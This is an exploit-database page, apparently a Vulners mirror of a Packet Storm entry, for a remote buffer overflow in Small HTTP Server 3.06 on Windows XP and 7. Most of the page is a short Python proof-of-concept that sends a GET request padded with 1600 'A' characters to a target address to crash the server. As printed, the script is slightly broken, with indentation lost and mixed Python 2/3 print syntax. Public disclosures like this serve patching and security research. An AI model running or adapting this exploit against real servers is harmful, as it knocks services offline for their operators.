Lucene search
K

Small HTTP Server 3.06 Remote Buffer Overflow

🗓️ 07 Apr 2022 00:00:00Reported by Yehia ElghalyType 
packetstorm
 packetstorm
🔗 packetstormsecurity.com👁 226 Views

Small HTTP Server 3.06 Remote Buffer Overflow discovered by Yehia Elghaly on 2022-04-07. Vulnerable version 3.06, tested on Windows XP SP3 and Windows 7 Professional. Buffer Overflow via long GET request

Code
`# Exploit Title: Small HTTP Server Remote Buffer Overflow  
# Discovered by: Yehia Elghaly  
# Discovered Date: 2022-04-07  
# Vendor Homepage: http://smallsrv.com/  
# Software Link : http://smallsrv.com/shttps_mgi.exe  
# Tested Version: 3.06  
# Vulnerability Type: Buffer Overflow Remote  
# Tested on OS: Windows XP SP3 - Windows 7 Professional x86 SP1   
  
# Description: Small HTTP Server 3.06 Long GET Remote Buffer Overflow  
  
  
#!/usr/bin/env python  
  
from requests.exceptions import ConnectionError  
from requests.compat import urljoin, quote_plus  
import requests as req  
  
try:  
url = "http://192.168.1.99"  
term = "A" * 1600  
evilb = urljoin(url, quote_plus(term))  
resp = req.request(method='GET', url=evilb)  
print(resp.text)  
except ConnectionError as e:  
print "Crashed!!"  
`

Data

Build on a solid foundation with Vulners data

We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data

Api

Power your application with Vulners API

The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access

App

Assess and manage vulnerabilities with Vulners tools

Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation

07 Apr 2022 00:00Current
0.7Low risk
Vulners AI Score0.7
226